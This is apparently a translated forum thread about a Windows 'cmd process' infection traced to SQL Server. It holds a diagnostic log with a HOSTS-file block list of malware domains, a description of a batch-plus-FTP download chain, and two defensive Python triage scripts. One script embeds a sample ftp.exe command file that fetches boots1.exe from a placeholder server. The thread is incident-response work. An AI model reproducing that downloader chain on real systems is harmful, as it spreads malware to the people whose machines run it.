.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  Error. ["hh.exe" %1]
.HLP  OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI  Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  Error. [超级解霸3000]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock providers
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS file
127.0.0.1      localhost
127.0.0.1  yu.8s7.net
127.0.0.1  1.jopanqc.com
127.0.0.1  2.joppnqq.com
127.0.0.1  wg.47255.com
127.0.0.1  1.joppnqq.com
127.0.0.1  xxx.m111.biz
127.0.0.1  1.jopenqc.com
127.0.0.1  1.jopenkk.com
127.0.0.1  xxx.vh7.biz
127.0.0.1  xxx.j41m.com
127.0.0.1  3.joppnqq.com
127.0.0.1  d.93se.com
127.0.0.1  www.868wg.com
127.0.0.1  xxx.mmma.biz
127.0.0.1  ilove.com
127.0.0.1  tp.shpzhan.cn
127.0.0.1  www.tomwg.com
127.0.0.1  www.cike007.cn
127.0.0.1  www.22aaa.com
127.0.0.1  xx.exiao01.com
127.0.0.1  www.exiao01.com
127.0.0.1  www.exiao01.com
127.0.0.1  new.749571.com
127.0.0.1  xtx.kv8.info
127.0.0.1  cao.kv8.info
127.0.0.1  1.jopmmqq.com
127.0.0.1  171817.171817.com
127.0.0.1  d2.llsging.com
127.0.0.1  down.malasc.cn
127.0.0.1  llboss.com
127.0.0.1  nx.51ylb.cn
127.0.0.1  my.531jx.cn
127.0.0.1  qqq.dzydhx.com
127.0.0.1  qqq.hao1658.com
127.0.0.1  www.333292.com
127.0.0.1  down.18dd.net
127.0.0.1  up.22x44.com
127.0.0.1  aaa.faba01.com
127.0.0.1  bad.tqdlt.cn
127.0.0.1  1.chsipo.com
127.0.0.1  c3.aishangai.net
127.0.0.1  c2.aishangai.net
127.0.0.1  xxx.188dm.com
127.0.0.1  x2.1a2b3c1.com
127.0.0.1  d1.163500.net
127.0.0.1  down.google-serv.cn
127.0.0.1  idc.windowsupdeta.cn
127.0.0.1  nc.mskess.com
127.0.0.1  ok.sl8cjs.cn
127.0.0.1  dl.pvs360.com
127.0.0.1  ta.pvs360.com
127.0.0.1  cw.pvs360.com
127.0.0.1  fg.pvs360.com

==================================
Process privilege scan
Special privilege enabled: SeLoadDriverPrivilege [PID = 1748, C:\PROGRA~1\MICROS~2\MSSQL\BINN\SQLSERVR.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]
Special privilege enabled: SeLoadDriverPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]

==================================
API HOOK
Entry point error: CreateProcessA (Risk level: High, hooked by module: 0x00FF3DA5)
Entry point error: CreateProcessW (Risk level: High, hooked by module: 0x00FF3E8D)

==================================
Hidden processes
N/A

==================================


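A dump like the one above is easier to triage mechanically than by eye. The script below is an added example, not code from this thread or from SREng: it parses the layout the posts use (its embedded SAMPLE is a constructed subset of the lines above, with the section labels in English) and answers three questions a responder asks of such a snapshot: which DLLs sit in nearly every process (here the Rising, 360.CN and Cognizance DLLs, going by the vendor fields), which images or modules carry no vendor information at all, and which API hooks are reported as a bare address rather than a module path, as CreateProcessA/W are above.

```python
"""Triage an SREng-style snapshot (process/module list, privilege scan, API
hook list) like the one pasted in the posts above.

Added example; not code from the original thread or from SREng. SAMPLE is a
constructed subset of the posted lines with the section text in English, and
the regexes assume that layout.
"""
import re
from collections import defaultdict

PROC_RE = re.compile(r'^\[PID: (\d+) / ([^\]]*)\]\[([^\]]+)\]\s+\[(.*)\]$')
MOD_RE = re.compile(r'^\s+\[([^\]]+)\]\s+\[(.*)\]$')
PRIV_RE = re.compile(r'^Special privilege enabled: (\w+) \[PID = (\d+), ([^\]]+)\]$')
HOOK_RE = re.compile(r'^Entry point error: (\w+) \(.*hooked by module: ([^)]+)\)$')

SAMPLE = r"""
[PID: 2936 / Administrator][C:\WINDOWS\ATK0100\HControl.exe]  [, 1043, 2, 15, 65]
    [C:\WINDOWS\ATK0100\CMSSC.dll]  [N/A, ]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3984 / Administrator][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
[PID: 3992 / Administrator][C:\WINDOWS\system32\notepad.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
Special privilege enabled: SeLoadDriverPrivilege [PID = 1748, C:\PROGRA~1\MICROS~2\MSSQL\BINN\SQLSERVR.EXE]
Special privilege enabled: SeDebugPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
Entry point error: CreateProcessA (Risk level: High, hooked by module: 0x00FF3DA5)
Entry point error: CreateProcessW (Risk level: High, hooked by module: 0x00FF3E8D)
"""


def vendor_of(info):
    """First field of a '[vendor, version]' block; '' or 'N/A' when absent."""
    return info.split(',', 1)[0].strip()


def parse_snapshot(text):
    """Return (processes, privileges, hooks) parsed from the snapshot text."""
    processes, privileges, hooks = [], [], []
    for line in text.splitlines():
        if m := PROC_RE.match(line):
            pid, user, image, info = m.groups()
            processes.append({'pid': int(pid), 'user': user, 'image': image,
                              'vendor': vendor_of(info), 'modules': []})
        elif (m := MOD_RE.match(line)) and processes:   # indented line = module of last process
            path, info = m.groups()
            processes[-1]['modules'].append((path, vendor_of(info)))
        elif m := PRIV_RE.match(line):
            priv, pid, image = m.groups()
            privileges.append((priv, int(pid), image))
        elif m := HOOK_RE.match(line):
            hooks.append(m.groups())                    # (api, owner module or address)
    return processes, privileges, hooks


def global_hook_dlls(processes, min_share=0.5):
    """Modules loaded by at least min_share of the processes that list modules.

    A DLL in nearly every interactive process is usually a system-wide hook
    (SetWindowsHookEx / AppInit_DLLs style). Identify each by path and vendor;
    prevalence alone is not a verdict.
    """
    hosts = [p for p in processes if p['modules']]
    seen = defaultdict(set)
    for proc in hosts:
        for path, _vendor in proc['modules']:
            seen[path.lower()].add(proc['pid'])
    return sorted(path for path, pids in seen.items()
                  if len(pids) / len(hosts) >= min_share)


def unattributed_images(processes):
    """(pid, path) for every image or module whose version block names no vendor."""
    out = []
    for proc in processes:
        if proc['vendor'] in ('', 'N/A'):
            out.append((proc['pid'], proc['image']))
        out.extend((proc['pid'], path) for path, vendor in proc['modules']
                   if vendor in ('', 'N/A'))
    return out


def unresolved_hooks(hooks):
    """Hooks whose owner is a bare address, not a module path: the tool could
    not attribute the hook target to a loaded module, so dump that region."""
    return [(api, owner) for api, owner in hooks
            if re.fullmatch(r'0x[0-9A-Fa-f]+', owner)]


def privileges_by_image(privileges):
    """Enabled privileges per image file name, e.g. {'sqlservr.exe': {...}}."""
    out = defaultdict(set)
    for priv, _pid, image in privileges:
        out[image.rsplit('\\', 1)[-1].lower()].add(priv)
    return dict(out)


if __name__ == '__main__':
    procs, privs, hooks = parse_snapshot(SAMPLE)
    print('global hook DLLs:', global_hook_dlls(procs))
    print('no vendor:', unattributed_images(procs))
    print('unresolved hooks:', unresolved_hooks(hooks))
    print('privileges:', privileges_by_image(privs))
```

Running it prints the ubiquitous DLLs, the vendor-less images, the unresolved hooks and the enabled privileges per image. None of these lists is a verdict: the ubiquitous DLLs and the SeDebugPrivilege/SeLoadDriverPrivilege holders are the inventory you check against what you know is installed on the box, and the unresolved hook addresses are where to start when that inventory does not explain them.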

Re: cmd process virus

The post above is the best approach, but in Group Policy the path for cmd is....

Re: cmd process virus

Setting the security permissions on cmd.exe so that only the administrator user can access it has temporarily solved the problem. The cmd process no longer pops up.

Re: cmd process virus

The way this virus works should be roughly this:
1. It launches a batch program through the SQL Server database process.
2. The batch script generates *.sys and *.bat files and writes into them the code that downloads the virus files via FTP.
3. It runs the generated batch file to download the virus via FTP.
4. Once the download finishes it runs the virus and deletes the downloader batch program, wiping out the traces of where the virus came from.
In other words, the *.sys and *.bat files mentioned above are not the virus themselves; they are used to download the virus.
The real virus is stuff like boots1.exe and bootss.exe.
From searching my machine, these viruses were never successfully downloaded onto my computer, probably because I have FTP disabled.
What makes this virus so nasty is that if you don't kill the virus code inside the SQL Server process, it will keep downloading all kinds of versions of viruses and trojans from different FTP servers, leaving your computer permanently on the edge of danger.
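The chain the poster describes (SQL Server spawning a batch script, the script writing an FTP command file and calling ftp.exe with it, then running what was fetched and deleting the downloader) is exactly the parent-child relationship that process-creation logging catches. The following Python is an added example, not anything from the thread: it walks constructed process-creation records (pid, ppid, image, command line) to list every process descended from sqlservr.exe, pulls the `-s:` script path out of any ftp.exe command line, and extracts the server, login and fetched file names from the script body. The record layout, the file names down.bat and down.sys, the server address and the ftp script contents are assumptions for illustration; only sqlservr.exe, cmd.exe, ftp.exe, boots1.exe and bootss.exe come from the post.

```python
"""Reconstruct the download chain described above from process-creation
records: sqlservr.exe -> cmd.exe (batch) -> ftp.exe -s:<script> -> payload.

Added example, not code from the thread. EVENTS and FTP_SCRIPT are constructed
to mirror the poster's description; the record layout (pid, ppid, image,
command line), the file names down.bat / down.sys and the server address are
assumptions. Only sqlservr.exe, cmd.exe, ftp.exe, boots1.exe and bootss.exe
come from the post.
"""
import re

EVENTS = [  # (pid, ppid, image path, command line) - constructed sample
    (1748, 700,  r'C:\PROGRA~1\MICROS~2\MSSQL\BINN\SQLSERVR.EXE', 'sqlservr.exe -sMSSQLSERVER'),
    (3992, 1200, r'C:\WINDOWS\system32\notepad.exe', 'notepad.exe'),
    (2600, 1748, r'C:\WINDOWS\system32\cmd.exe', r'cmd.exe /c C:\WINDOWS\system32\down.bat'),
    (2604, 2600, r'C:\WINDOWS\system32\ftp.exe', r'ftp -s:C:\WINDOWS\system32\down.sys'),
    (2610, 2600, r'C:\WINDOWS\system32\boots1.exe', 'boots1.exe'),
    (2612, 2600, r'C:\WINDOWS\system32\cmd.exe', r'cmd.exe /c del C:\WINDOWS\system32\down.bat'),
]

FTP_SCRIPT = """open 192.0.2.10
anonymous
anonymous@example.com
binary
get boots1.exe
get bootss.exe
bye
"""  # constructed contents of the "-s:" file the batch script writes

FTP_COMMANDS = {'open', 'user', 'binary', 'bin', 'ascii', 'get', 'mget',
                'cd', 'lcd', 'prompt', 'bye', 'quit'}


def image_name(path):
    """Lower-cased file name of an image path, to compare regardless of location."""
    return path.rsplit('\\', 1)[-1].lower()


def lineage(pid, by_pid):
    """Chain of image names from the outermost known ancestor down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # seen guards against pid-reuse loops
        seen.add(pid)
        chain.append(image_name(by_pid[pid][2]))
        pid = by_pid[pid][1]
    return chain[::-1]


def chains_under(events, root='sqlservr.exe'):
    """(pid, chain, cmdline) for every process that has root as an ancestor."""
    by_pid = {e[0]: e for e in events}
    hits = []
    for pid, _ppid, _image, cmdline in events:
        chain = lineage(pid, by_pid)
        if root in chain[:-1]:                    # ancestor, not the process itself
            hits.append((pid, chain, cmdline))
    return hits


def ftp_script_path(cmdline):
    """The file handed to ftp.exe via -s:<file>, or None if this is not such a call."""
    m = re.search(r'(?i)\bftp(?:\.exe)?\b.*?-s:(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else None


def parse_ftp_script(text):
    """Indicators from an ftp.exe command script: server, login, files fetched.

    After 'open', ftp.exe answers its own user/password prompts from the next
    script lines, so bare lines are taken as username then password;
    an explicit 'user <name> [password]' line is handled as well.
    """
    info = {'host': None, 'user': None, 'password': None, 'files': []}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        verb, args = parts[0].lower(), parts[1:]
        if verb == 'open' and args:
            info['host'] = args[0]
        elif verb == 'user' and args:
            info['user'] = args[0]
            info['password'] = args[1] if len(args) > 1 else None
        elif verb in ('get', 'mget') and args:
            info['files'].extend(args)
        elif verb not in FTP_COMMANDS:            # bare line answering a login prompt
            if info['user'] is None:
                info['user'] = parts[0]
            elif info['password'] is None:
                info['password'] = parts[0]
    return info


def triage(events, script_text):
    """Findings for everything under SQL Server; ftp.exe hits also carry the IoCs
    parsed from script_text (in the field: read the -s: file before it is deleted)."""
    findings = []
    for pid, chain, cmdline in chains_under(events):
        finding = {'pid': pid, 'chain': ' -> '.join(chain), 'cmdline': cmdline}
        if path := ftp_script_path(cmdline):
            finding['ftp_script'] = path
            finding['iocs'] = parse_ftp_script(script_text)
        findings.append(finding)
    return findings


if __name__ == '__main__':
    for finding in triage(EVENTS, FTP_SCRIPT):
        print(finding)
```

The parent-child check is the durable part: a database service has no business spawning cmd.exe, whatever the batch file is called, so the rule survives renamed downloaders. The ftp script is worth grabbing the moment ftp.exe is seen, because, as the post notes, the batch file cleans up after itself; the server and file names it contains are the indicators you need to trace where the payload came from.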

Re: cmd process virus

And you never know where these viruses come from. Kill one and another shows up.
Powered by Discuz!NT